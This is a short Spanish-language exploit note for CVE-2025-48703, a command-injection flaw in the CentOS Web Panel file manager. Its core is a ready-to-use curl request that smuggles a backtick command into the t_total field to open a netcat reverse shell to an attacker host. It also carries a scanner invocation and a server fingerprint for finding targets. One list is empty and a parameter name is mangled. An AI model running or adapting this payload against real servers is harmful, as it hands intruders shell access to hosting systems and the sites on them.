
Ejecución remota de código en el panel web de CentOS
CVE-2025-48703 es una vulnerabilidad de Ejecución Remota de Código (RCE) en el módulo filemanager de un panel de control de hosting web (por ejemplo, cPanel). Ocurre debido a manejo de entrada sin desinfección en la función acc=changePerm, lo que permite a un atacante inyectar y ejecutar comandos arbitrarios del sistema utilizando el parámetro t_total.
Esta vulnerabilidad permite a los atacantes:
⚠️ Este ataque puede realizarse con autenticación mínima, o en algunas configuraciones, acceso sin autenticación.
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #Make sure targets.txt is in the same dir
Server: cwpsrv
Referencia: https://fenrisk.com/rce-centos-webpanel